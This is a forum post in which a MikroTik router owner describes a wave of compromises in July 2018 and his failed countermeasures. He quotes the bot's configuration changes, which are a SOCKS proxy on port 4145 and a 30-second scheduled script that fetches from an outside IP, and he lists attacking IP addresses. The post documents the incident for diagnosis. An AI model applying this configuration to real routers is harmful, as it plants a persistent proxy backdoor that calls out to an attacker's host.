Hello,
I’ve been using RouterOS 6.35. I noticed someone logged into my router on 26th July 2018 and made some changes. On subsequent days, I found my other MikroTik routers were being hacked one by one in exactly the same way. Then I found my home MikroTik is hacked as well. When my first routers was hacked, I changed passwords on other routers. After second routers was hacked, I even replaced the username “admin” on other routers, and I turned ssh, api, http services off. But to my added surprise I found other routers were hacked even after those preventive measures. Then I upgraded all routers to RouterOS 6.41.3.
I compared the .rsc backup file’s texts before and after the hacking took place. I found the bot making only the following changes to the configuration after disabling all the “drop” rules in firewall:
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ owner=admin policy=
ftp,reboot,read,write,policy,test,password,sensitive source=“/tool fetch a
ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http”
Here’s a list of IPs from where the hacking attempt took place:
95.154.216.151
38.75.137.158
193.70.6.197
103.207.37.69
94.23.145.124
*there were some more IPs that I didn’t copy.